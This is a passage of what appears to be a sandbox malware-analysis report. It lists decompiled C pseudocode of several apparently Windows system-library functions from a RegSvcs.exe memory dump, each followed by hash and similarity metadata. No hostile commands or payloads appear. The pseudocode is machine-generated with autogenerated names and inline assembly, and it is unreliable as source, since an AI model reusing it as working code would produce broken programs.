                                          					_t53 = 1 << (_t59 >> 0x00000002 & 0x0000003f);
                                          					_push(0x8000);
                                          					_t11 = _t53 - 1; // 0x0
                                          					_t12 = _t53 - 1; // 0x0
                                          					_v16 = ((_t59 >> 0x00000001 & 1) + (_t59 >> 0xc) << 0xc) - 1 + (1 << (_t59 >> 0x00000002 & 0x0000003f)) - (_t11 + ((_t59 >> 0x00000001 & 1) + (_t59 >> 0x0000000c) << 0x0000000c) & _t12);
                                          					E013BAFDE( &_v12,  &_v16);
                                          					asm("lock xadd [eax], ecx");
                                          					asm("lock xadd [eax], ecx");
                                          					E013BBCD2(_v8,  *_t91,  *((intOrPtr*)(_t91 + 4)));
                                          					_t55 = _v36;
                                          					_t88 = _v36;
                                          					if(E01317D50() == 0) {
                                          						_t40 = 0x7ffe0388;
                                          					} else {
                                          						_t55 = _v19;
                                          						_t40 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
                                          					}
                                          					if( *_t40 != 0) {
                                          						E013AFE3F(_t55, _t91, _v15, _t55);
                                          					}
                                          				} else {
                                          					if(_t86 == 0) {
                                          						E0130FFB0(_t50, _t86, _t50);
                                          						_t75 = _v16;
                                          					}
                                          					_push(_t58);
                                          					_t88 = 0;
                                          					_push(0);
                                          					E013BA80D(_t91, 8, _t75, 0);
                                          				}
                                          				return _t88;
                                          			}

                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: f5f831e91637f778ab1786019c0fe1c1c634a5059deceac50859eb6d9a86e6aa
                                          • Instruction ID: 217b309cd2d0d432ae7e306c9cf35a110db50853221f3a663996a009c6a9e2e7
                                          • Opcode Fuzzy Hash: f5f831e91637f778ab1786019c0fe1c1c634a5059deceac50859eb6d9a86e6aa
                                          • Instruction Fuzzy Hash: 1931A5726047069BD719DF2CC8C0A9BB7A9FBC4654F04492DE65687B45EE30E805C7A1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 69%
                                          			E013769A6(signed short* __ecx, void* __eflags) {
                                          				signed int _v8;
                                          				signed int _v16;
                                          				intOrPtr _v20;
                                          				signed int _v24;
                                          				signed short _v28;
                                          				signed int _v32;
                                          				intOrPtr _v36;
                                          				signed int _v40;
                                          				char* _v44;
                                          				signed int _v48;
                                          				intOrPtr _v52;
                                          				signed int _v56;
                                          				char _v60;
                                          				signed int _v64;
                                          				char _v68;
                                          				char _v72;
                                          				signed short* _v76;
                                          				signed int _v80;
                                          				char _v84;
                                          				void* __ebx;
                                          				void* __edi;
                                          				void* __esi;
                                          				void* _t68;
                                          				intOrPtr _t73;
                                          				signed short* _t74;
                                          				void* _t77;
                                          				void* _t78;
                                          				signed int _t79;
                                          				signed int _t80;
                                          
                                          				_v8 =  *0x13ed360 ^ _t80;
                                          				_t75 = 0x100;
                                          				_v64 = _v64 & 0x00000000;
                                          				_v76 = __ecx;
                                          				_t79 = 0;
                                          				_t68 = 0;
                                          				_v72 = 1;
                                          				_v68 =  *((intOrPtr*)( *[fs:0x18] + 0x20));
                                          				_t77 = 0;
                                          				if(L01306C59(__ecx[2], 0x100, __eflags) != 0) {
                                          					_t79 =  *((intOrPtr*)( *[fs:0x30] + 0x1e8));
                                          					if(_t79 != 0 && E01376BA3() != 0) {
                                          						_push(0);
                                          						_push(0);
                                          						_push(0);
                                          						_push(0x1f0003);
                                          						_push( &_v64);
                                          						if(E01339980() >= 0) {
                                          							E01312280(_t56, 0x13e8778);
                                          							_t77 = 1;
                                          							_t68 = 1;
                                          							if( *0x13e8774 == 0) {
                                          								asm("cdq");
                                          								 *(_t79 + 0xf70) = _v64;
                                          								 *(_t79 + 0xf74) = 0x100;
                                          								_t75 = 0;
                                          								_t73 = 4;
                                          								_v60 =  &_v68;
                                          								_v52 = _t73;
                                          								_v36 = _t73;
                                          								_t74 = _v76;
                                          								_v44 =  &_v72;
                                          								 *0x13e8774 = 1;
                                          								_v56 = 0;
                                          								_v28 = _t74[2];
                                          								_v48 = 0;
                                          								_v20 = ( *_t74 & 0x0000ffff) + 2;
                                          								_v40 = 0;
                                          								_v32 = 0;
                                          								_v24 = 0;
                                          								_v16 = 0;
                                          								if(E012FB6F0(0x12dc338, 0x12dc288, 3,  &_v60) == 0) {
                                          									_v80 = _v80 | 0xffffffff;
                                          									_push( &_v84);
                                          									_push(0);
                                          									_push(_v64);
                                          									_v84 = 0xfa0a1f00;
                                          									E01339520();
                                          								}
                                          							}
                                          						}
                                          					}
                                          				}
                                          				if(_v64 != 0) {
                                          					_push(_v64);
                                          					E013395D0();
                                          					 *(_t79 + 0xf70) =  *(_t79 + 0xf70) & 0x00000000;
                                          					 *(_t79 + 0xf74) =  *(_t79 + 0xf74) & 0x00000000;
                                          				}
                                          				if(_t77 != 0) {
                                          					E0130FFB0(_t68, _t77, 0x13e8778);
                                          				}
                                          				_pop(_t78);
                                          				return E0133B640(_t68, _t68, _v8 ^ _t80, _t75, _t78, _t79);
                                          			}

                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: a2b6be2ce2ebc3c4d4a2ecb0db8bdd587b3a2464ba43474d02c4a8bfed689764
                                          • Instruction ID: 03a6e1f06409d24730046dfa9201e2f5ddfad0ecd7704d74f50814c62555c6d5
                                          • Opcode Fuzzy Hash: a2b6be2ce2ebc3c4d4a2ecb0db8bdd587b3a2464ba43474d02c4a8bfed689764
                                          • Instruction Fuzzy Hash: 15418FB1D007099FEB24DFA9C941BFEBBF8EF48718F14852AE914A7240DB749905CB50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 85%
                                          			E012F5210(intOrPtr _a4, void* _a8) {
                                          				void* __ecx;
                                          				intOrPtr _t31;
                                          				signed int _t32;
                                          				signed int _t33;
                                          				intOrPtr _t35;
                                          				signed int _t52;
                                          				void* _t54;
                                          				void* _t56;
                                          				unsigned int _t59;
                                          				signed int _t60;
                                          				void* _t61;
                                          
                                          				_t61 = E012F52A5(1);
                                          				if(_t61 == 0) {
                                          					_t31 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
                                          					_t54 =  *((intOrPtr*)(_t31 + 0x28));
                                          					_t59 =  *(_t31 + 0x24) & 0x0000ffff;
                                          				} else {
                                          					_t54 =  *((intOrPtr*)(_t61 + 0x10));
                                          					_t59 =  *(_t61 + 0xc) & 0x0000ffff;
                                          				}
                                          				_t60 = _t59 >> 1;
                                          				_t32 = 0x3a;
                                          				if(_t60 < 2 ||  *((intOrPtr*)(_t54 + _t60 * 2 - 4)) == _t32) {
                                          					_t52 = _t60 + _t60;
                                          					if(_a4 > _t52) {
                                          						goto L5;
                                          					}
                                          					if(_t61 != 0) {
                                          						asm("lock xadd [esi], eax");
                                          						if((_t32 | 0xffffffff) == 0) {
                                          							_push( *((intOrPtr*)(_t61 + 4)));
                                          							E013395D0();
                                          							L013177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
                                          						}
                                          					} else {
                                          						E0130EB70(_t54, 0x13e79a0);
                                          					}
                                          					_t26 = _t52 + 2; // 0xddeeddf0
                                          					return _t26;
                                          				} else {
                                          					_t52 = _t60 + _t60;
                                          					if(_a4 < _t52) {
                                          						if(_t61 != 0) {
                                          							asm("lock xadd [esi], eax");
                                          							if((_t32 | 0xffffffff) == 0) {
                                          								_push( *((intOrPtr*)(_t61 + 4)));
                                          								E013395D0();
                                          								L013177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
                                          							}
                                          						} else {
                                          							E0130EB70(_t54, 0x13e79a0);
                                          						}
                                          						return _t52;
                                          					}
                                          					L5:
                                          					_t33 = E0133F3E0(_a8, _t54, _t52);
                                          					if(_t61 == 0) {
                                          						E0130EB70(_t54, 0x13e79a0);
                                          					} else {
                                          						asm("lock xadd [esi], eax");
                                          						if((_t33 | 0xffffffff) == 0) {
                                          							_push( *((intOrPtr*)(_t61 + 4)));
                                          							E013395D0();
                                          							L013177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
                                          						}
                                          					}
                                          					_t35 = _a8;
                                          					if(_t60 <= 1) {
                                          						L9:
                                          						_t60 = _t60 - 1;
                                          						 *((short*)(_t52 + _t35 - 2)) = 0;
                                          						goto L10;
                                          					} else {
                                          						_t56 = 0x3a;
                                          						if( *((intOrPtr*)(_t35 + _t60 * 2 - 4)) == _t56) {
                                          							 *((short*)(_t52 + _t35)) = 0;
                                          							L10:
                                          							return _t60 + _t60;
                                          						}
                                          						goto L9;
                                          					}
                                          				}
                                          			}















                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 2f5fa645ee7b34e5ec952d805b2b17105e5207ca1b76c77965ee6fb11fd93fc1
                                          • Instruction ID: e385d0702bfeb581cab22868cb855e52035d32284526b8481020b92ac4081957
                                          • Opcode Fuzzy Hash: 2f5fa645ee7b34e5ec952d805b2b17105e5207ca1b76c77965ee6fb11fd93fc1
                                          • Instruction Fuzzy Hash: 22311631261611DBC76AAB1CC851F6AB7E5FF50B68F114B29F9550B6E0DB61E800C790
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E01333D43(signed short* __ecx, signed short* __edx, signed short* _a4, signed short** _a8, intOrPtr* _a12, intOrPtr* _a16) {
                                          				intOrPtr _v8;
                                          				char _v12;
                                          				signed short** _t33;
                                          				short* _t38;
                                          				intOrPtr* _t39;
                                          				intOrPtr* _t41;
                                          				signed short _t43;
                                          				intOrPtr* _t47;
                                          				intOrPtr* _t53;
                                          				signed short _t57;
                                          				intOrPtr _t58;
                                          				signed short _t60;
                                          				signed short* _t61;
                                          
                                          				_t47 = __ecx;
                                          				_t61 = __edx;
                                          				_t60 = ( *__ecx & 0x0000ffff) + 2;
                                          				if(_t60 > 0xfffe) {
                                          					L22:
                                          					return 0xc0000106;
                                          				}
                                          				if(__edx != 0) {
                                          					if(_t60 <= ( *(__edx + 2) & 0x0000ffff)) {
                                          						L5:
                                          						E01307B60(0, _t61, 0x12d11c4);
                                          						_v12 =  *_t47;
                                          						_v12 = _v12 + 0xfff8;
                                          						_v8 =  *((intOrPtr*)(_t47 + 4)) + 8;
                                          						E01307B60(0xfff8, _t61,  &_v12);
                                          						_t33 = _a8;
                                          						if(_t33 != 0) {
                                          							 *_t33 = _t61;
                                          						}
                                          						 *((short*)(_t61[2] + (( *_t61 & 0x0000ffff) >> 1) * 2)) = 0;
                                          						_t53 = _a12;
                                          						if(_t53 != 0) {
                                          							_t57 = _t61[2];
                                          							_t38 = _t57 + ((( *_t61 & 0x0000ffff) >> 1) - 1) * 2;
                                          							while(_t38 >= _t57) {
                                          								if( *_t38 == 0x5c) {
                                          									_t41 = _t38 + 2;
                                          									if(_t41 == 0) {
                                          										break;
                                          									}
                                          									_t58 = 0;
                                          									if( *_t41 == 0) {
                                          										L19:
                                          										 *_t53 = _t58;
                                          										goto L7;
                                          									}
                                          									 *_t53 = _t41;
                                          									goto L7;
                                          								}
                                          								_t38 = _t38 - 2;
                                          							}
                                          							_t58 = 0;
                                          							goto L19;
                                          						} else {
                                          							L7:
                                          							_t39 = _a16;
                                          							if(_t39 != 0) {
                                          								 *_t39 = 0;
                                          								 *((intOrPtr*)(_t39 + 4)) = 0;
                                          								 *((intOrPtr*)(_t39 + 8)) = 0;
                                          								 *((intOrPtr*)(_t39 + 0xc)) = 0;
                                          							}
                                          							return 0;
                                          						}
                                          					}
                                          					_t61 = _a4;
                                          					if(_t61 != 0) {
                                          						L3:
                                          						_t43 = L01314620(0,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t60);
                                          						_t61[2] = _t43;
                                          						if(_t43 == 0) {
                                          							return 0xc0000017;
                                          						}
                                          						_t61[1] = _t60;
                                          						 *_t61 = 0;
                                          						goto L5;
                                          					}
                                          					goto L22;
                                          				}
                                          				_t61 = _a4;
                                          				if(_t61 == 0) {
                                          					return 0xc000000d;
                                          				}
                                          				goto L3;
                                          			}

















                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 1c090a36f2cdc354308cb98133f4825358ee295ce05ed9d748df02ce4ba30710
                                          • Instruction ID: 38e20e580f08be401d0dd481701ae9621061f6f02c264d4581337239ea4f3095
                                          • Opcode Fuzzy Hash: 1c090a36f2cdc354308cb98133f4825358ee295ce05ed9d748df02ce4ba30710
                                          • Instruction Fuzzy Hash: 4C31ED32A00615DBC725CF2DC845A2ABBE9FF84718B05C06AE84ACB750E734D840C7A4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 78%
                                          			E0132A61C(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
                                          				intOrPtr _t35;
                                          				intOrPtr _t39;
                                          				intOrPtr _t45;
                                          				intOrPtr* _t51;
                                          				intOrPtr* _t52;
                                          				intOrPtr* _t55;
                                          				signed int _t57;
                                          				intOrPtr* _t59;
                                          				intOrPtr _t68;
                                          				intOrPtr* _t77;
                                          				void* _t79;
                                          				signed int _t80;
                                          				intOrPtr _t81;
                                          				char* _t82;
                                          				void* _t83;
                                          
                                          				_push(0x24);
                                          				_push(0x13d0220);
                                          				E0134D08C(__ebx, __edi, __esi);
                                          				 *((intOrPtr*)(_t83 - 0x30)) = __edx;
                                          				_t79 = __ecx;
                                          				_t35 =  *0x13e7b9c; // 0x0
                                          				_t55 = L01314620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t35 + 0xc0000, 0x28);
                                          				 *((intOrPtr*)(_t83 - 0x24)) = _t55;
                                          				if(_t55 == 0) {
                                          					_t39 = 0xc0000017;
                                          					L11:
                                          					return E0134D0D1(_t39);
                                          				}
                                          				_t68 = 0;
                                          				 *((intOrPtr*)(_t83 - 0x1c)) = 0;
                                          				 *(_t83 - 4) =  *(_t83 - 4) & 0;
                                          				_t7 = _t55 + 8; // 0x8
                                          				_t57 = 6;
                                          				memcpy(_t7, _t79, _t57 << 2);
                                          				_t80 = 0xfffffffe;
                                          				 *(_t83 - 4) = _t80;
                                          				if(0 < 0) {
                                          					L14:
                                          					_t81 =  *((intOrPtr*)(_t83 - 0x1c));
                                          					L20:
                                          					L013177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t55);
                                          					_t39 = _t81;
                                          					goto L11;
                                          				}
                                          				if( *((intOrPtr*)(_t55 + 0xc)) <  *(_t55 + 8)) {
                                          					_t81 = 0xc000007b;
                                          					goto L20;
                                          				}
                                          				if( *((intOrPtr*)(_t83 + 0xc)) == 0) {
                                          					_t59 =  *((intOrPtr*)(_t83 + 8));
                                          					_t45 =  *_t59;
                                          					 *((intOrPtr*)(_t83 - 0x20)) = _t45;
                                          					 *_t59 = _t45 + 1;
                                          					L6:
                                          					 *(_t83 - 4) = 1;
                                          					 *((intOrPtr*)( *((intOrPtr*)(_t55 + 0x10)))) =  *((intOrPtr*)(_t83 - 0x20));
                                          					 *(_t83 - 4) = _t80;
                                          					if(_t68 < 0) {
                                          						_t82 =  *((intOrPtr*)(_t83 + 0xc));
                                          						if(_t82 == 0) {
                                          							goto L14;
                                          						}
                                          						asm("btr eax, ecx");
                                          						_t81 =  *((intOrPtr*)(_t83 - 0x1c));
                                          						if( *_t82 != 0) {
                                          							 *0x13e7b10 =  *0x13e7b10 - 8;
                                          						}
                                          						goto L20;
                                          					}
                                          					 *((intOrPtr*)(_t55 + 0x24)) =  *((intOrPtr*)(_t83 - 0x20));
                                          					 *((intOrPtr*)(_t55 + 0x20)) =  *((intOrPtr*)(_t83 - 0x30));
                                          					_t51 =  *0x13e536c; // 0x77e45368
                                          					if( *_t51 != 0x13e5368) {
                                          						_push(3);
                                          						asm("int 0x29");
                                          						goto L14;
                                          					}
                                          					 *_t55 = 0x13e5368;
                                          					 *((intOrPtr*)(_t55 + 4)) = _t51;
                                          					 *_t51 = _t55;
                                          					 *0x13e536c = _t55;
                                          					_t52 =  *((intOrPtr*)(_t83 + 0x10));
                                          					if(_t52 != 0) {
                                          						 *_t52 = _t55;
                                          					}
                                          					_t39 = 0;
                                          					goto L11;
                                          				}
                                          				_t77 =  *((intOrPtr*)(_t83 + 8));
                                          				_t68 = E0132A70E(_t77,  *((intOrPtr*)(_t83 + 0xc)));
                                          				 *((intOrPtr*)(_t83 - 0x1c)) = _t68;
                                          				if(_t68 < 0) {
                                          					goto L14;
                                          				}
                                          				 *((intOrPtr*)(_t83 - 0x20)) =  *_t77;
                                          				goto L6;
                                          			}



















                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: f3b409b07071e0c277e4e5ec643979f9be928dcb529cdf6acaa98a07ac183001
                                          • Instruction ID: 7011a826c8edefaed352f1e58641561aac5a2fe549c5344179c453a5a79ed60f
                                          • Opcode Fuzzy Hash: f3b409b07071e0c277e4e5ec643979f9be928dcb529cdf6acaa98a07ac183001
                                          • Instruction Fuzzy Hash: 2A417B75A00219DFCB25DF58C880B99BBF5BB49318F14C069E905AF788C774A901CF94
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 68%
                                          			E0131C182(void* __ecx, unsigned int* __edx, intOrPtr _a4) {
                                          				signed int* _v8;
                                          				char _v16;
                                          				void* __ebx;
                                          				void* __edi;
                                          				signed char _t33;
                                          				signed char _t43;
                                          				signed char _t48;
                                          				signed char _t62;
                                          				void* _t63;
                                          				intOrPtr _t69;
                                          				intOrPtr _t71;
                                          				unsigned int* _t82;
                                          				void* _t83;
                                          
                                          				_t80 = __ecx;
                                          				_t82 = __edx;
                                          				_t33 =  *((intOrPtr*)(__ecx + 0xde));
                                          				_t62 = _t33 >> 0x00000001 & 0x00000001;
                                          				if((_t33 & 0x00000001) != 0) {
                                          					_v8 = ((0 | _t62 != 0x00000000) - 0x00000001 & 0x00000048) + 8 + __edx;
                                          					if(E01317D50() != 0) {
                                          						_t43 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                          					} else {
                                          						_t43 = 0x7ffe0386;
                                          					}
                                          					if( *_t43 != 0) {
                                          						_t43 = E013C8D34(_v8, _t80);
                                          					}
                                          					E01312280(_t43, _t82);
                                          					if( *((char*)(_t80 + 0xdc)) == 0) {
                                          						E0130FFB0(_t62, _t80, _t82);
                                          						 *(_t80 + 0xde) =  *(_t80 + 0xde) | 0x00000004;
                                          						_t30 = _t80 + 0xd0; // 0xd0
                                          						_t83 = _t30;
                                          						E013C8833(_t83,  &_v16);
                                          						_t81 = _t80 + 0x90;
                                          						E0130FFB0(_t62, _t80 + 0x90, _t80 + 0x90);
                                          						_t63 = 0;
                                          						_push(0);
                                          						_push(_t83);
                                          						_t48 = E0133B180();
                                          						if(_a4 != 0) {
                                          							E01312280(_t48, _t81);
                                          						}
                                          					} else {
                                          						_t69 = _v8;
                                          						_t12 = _t80 + 0x98; // 0x98
                                          						_t13 = _t69 + 0xc; // 0x575651ff
                                          						E0131BB2D(_t13, _t12);
                                          						_t71 = _v8;
                                          						_t15 = _t80 + 0xb0; // 0xb0
                                          						_t16 = _t71 + 8; // 0x8b000cc2
                                          						E0131BB2D(_t16, _t15);
                                          						E0131B944(_v8, _t62);
                                          						 *((char*)(_t80 + 0xdc)) = 0;
                                          						E0130FFB0(0, _t80, _t82);
                                          						 *((intOrPtr*)(_t80 + 0xd8)) = 0;
                                          						 *((intOrPtr*)(_t80 + 0xc8)) = 0;
                                          						 *((intOrPtr*)(_t80 + 0xcc)) = 0;
                                          						 *(_t80 + 0xde) = 0;
                                          						if(_a4 == 0) {
                                          							_t25 = _t80 + 0x90; // 0x90
                                          							E0130FFB0(0, _t80, _t25);
                                          						}
                                          						_t63 = 1;
                                          					}
                                          					return _t63;
                                          				}
                                          				 *((intOrPtr*)(__ecx + 0xc8)) = 0;
                                          				 *((intOrPtr*)(__ecx + 0xcc)) = 0;
                                          				if(_a4 == 0) {
                                          					_t24 = _t80 + 0x90; // 0x90
                                          					E0130FFB0(0, __ecx, _t24);
                                          				}
                                          				return 0;
                                          			}

                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
                                          • Instruction ID: 8dd20e2c4d01e7ac8b845746adcd1fd24db86a0fbe7085fbf9c7e9ac108b53a1
                                          • Opcode Fuzzy Hash: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
                                          • Instruction Fuzzy Hash: 8E314D7164154BBFD719EBB8C490BEAF7A8BF5210CF04815AC41C47249DB386A1AC7D0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 76%
                                          			E01377016(short __ecx, intOrPtr __edx, char _a4, char _a8, signed short* _a12, signed short* _a16) {
                                          				signed int _v8;
                                          				char _v588;
                                          				intOrPtr _v592;
                                          				intOrPtr _v596;
                                          				signed short* _v600;
                                          				char _v604;
                                          				short _v606;
                                          				void* __ebx;
                                          				void* __edi;
                                          				void* __esi;
                                          				signed short* _t55;
                                          				void* _t56;
                                          				signed short* _t58;
                                          				signed char* _t61;
                                          				char* _t68;
                                          				void* _t69;
                                          				void* _t71;
                                          				void* _t72;
                                          				signed int _t75;
                                          
                                          				_t64 = __edx;
                                          				_t77 = (_t75 & 0xfffffff8) - 0x25c;
                                          				_v8 =  *0x13ed360 ^ (_t75 & 0xfffffff8) - 0x0000025c;
                                          				_t55 = _a16;
                                          				_v606 = __ecx;
                                          				_t71 = 0;
                                          				_t58 = _a12;
                                          				_v596 = __edx;
                                          				_v600 = _t58;
                                          				_t68 =  &_v588;
                                          				if(_t58 != 0) {
                                          					_t71 = ( *_t58 & 0x0000ffff) + 2;
                                          					if(_t55 != 0) {
                                          						_t71 = _t71 + ( *_t55 & 0x0000ffff) + 2;
                                          					}
                                          				}
                                          				_t8 = _t71 + 0x2a; // 0x28
                                          				_t33 = _t8;
                                          				_v592 = _t8;
                                          				if(_t71 <= 0x214) {
                                          					L6:
                                          					 *((short*)(_t68 + 6)) = _v606;
                                          					if(_t64 != 0xffffffff) {
                                          						asm("cdq");
                                          						 *((intOrPtr*)(_t68 + 0x20)) = _t64;
                                          						 *((char*)(_t68 + 0x28)) = _a4;
                                          						 *((intOrPtr*)(_t68 + 0x24)) = _t64;
                                          						 *((char*)(_t68 + 0x29)) = _a8;
                                          						if(_t71 != 0) {
                                          							_t22 = _t68 + 0x2a; // 0x2a
                                          							_t64 = _t22;
                                          							E01376B4C(_t58, _t22, _t71,  &_v604);
                                          							if(_t55 != 0) {
                                          								_t25 = _v604 + 0x2a; // 0x2a
                                          								_t64 = _t25 + _t68;
                                          								E01376B4C(_t55, _t25 + _t68, _t71 - _v604,  &_v604);
                                          							}
                                          							if(E01317D50() == 0) {
                                          								_t61 = 0x7ffe0384;
                                          							} else {
                                          								_t61 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                          							}
                                          							_push(_t68);
                                          							_push(_v592 + 0xffffffe0);
                                          							_push(0x402);
                                          							_push( *_t61 & 0x000000ff);
                                          							E01339AE0();
                                          						}
                                          					}
                                          					_t35 =  &_v588;
                                          					if( &_v588 != _t68) {
                                          						_t35 = L013177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t68);
                                          					}
                                          					L16:
                                          					_pop(_t69);
                                          					_pop(_t72);
                                          					_pop(_t56);
                                          					return E0133B640(_t35, _t56, _v8 ^ _t77, _t64, _t69, _t72);
                                          				}
                                          				_t68 = L01314620(_t58,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t33);
                                          				if(_t68 == 0) {
                                          					goto L16;
                                          				} else {
                                          					_t58 = _v600;
                                          					_t64 = _v596;
                                          					goto L6;
                                          				}
                                          			}

                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: b47634773d8f739a73d301d2c761f3adaba860c53708a4c1c4f837f2d31df4b0
                                          • Instruction ID: 27fd0e801b35c34d286e5e2f586b8c7a015f5c6609ccd4ecb085722de15ec0dd
                                          • Opcode Fuzzy Hash: b47634773d8f739a73d301d2c761f3adaba860c53708a4c1c4f837f2d31df4b0
                                          • Instruction Fuzzy Hash: FA31C2726047519FD331DF2CC844A6AB7E9BFC8704F044A29F99587690E734E904CBA6
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 92%
                                          			E0132A70E(intOrPtr* __ecx, char* __edx) {
                                          				unsigned int _v8;
                                          				intOrPtr* _v12;
                                          				void* __ebx;
                                          				void* __edi;
                                          				void* __esi;
                                          				void* _t16;
                                          				intOrPtr _t17;
                                          				intOrPtr _t28;
                                          				char* _t33;
                                          				intOrPtr _t37;
                                          				intOrPtr _t38;
                                          				void* _t50;
                                          				intOrPtr _t52;
                                          
                                          				_push(__ecx);
                                          				_push(__ecx);
                                          				_t52 =  *0x13e7b10; // 0x0
                                          				_t33 = __edx;
                                          				_t48 = __ecx;
                                          				_v12 = __ecx;
                                          				if(_t52 == 0) {
                                          					 *0x13e7b10 = 8;
                                          					 *0x13e7b14 = 0x13e7b0c;
                                          					 *0x13e7b18 = 1;
                                          					L6:
                                          					_t2 = _t52 + 1; // 0x1
                                          					E0132A990(0x13e7b10, _t2, 7);
                                          					asm("bts ecx, eax");
                                          					 *_t48 = _t52;
                                          					 *_t33 = 1;
                                          					L3:
                                          					_t16 = 0;
                                          					L4:
                                          					return _t16;
                                          				}
                                          				_t17 = L0132A840(__edx, __ecx, __ecx, _t52, 0x13e7b10, 1, 0);
                                          				if(_t17 == 0xffffffff) {
                                          					_t37 =  *0x13e7b10; // 0x0
                                          					_t3 = _t37 + 0x27; // 0x27
                                          					__eflags = _t3 >> 5 -  *0x13e7b18; // 0x0
                                          					if(__eflags > 0) {
                                          						_t38 =  *0x13e7b9c; // 0x0
                                          						_t4 = _t52 + 0x27; // 0x27
                                          						_v8 = _t4 >> 5;
                                          						_t50 = L01314620(_t38 + 0xc0000,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t38 + 0xc0000, _t4 >> 5 << 2);
                                          						__eflags = _t50;
                                          						if(_t50 == 0) {
                                          							_t16 = 0xc0000017;
                                          							goto L4;
                                          						}
                                          						 *0x13e7b18 = _v8;
                                          						_t8 = _t52 + 7; // 0x7
                                          						E0133F3E0(_t50,  *0x13e7b14, _t8 >> 3);
                                          						_t28 =  *0x13e7b14; // 0x0
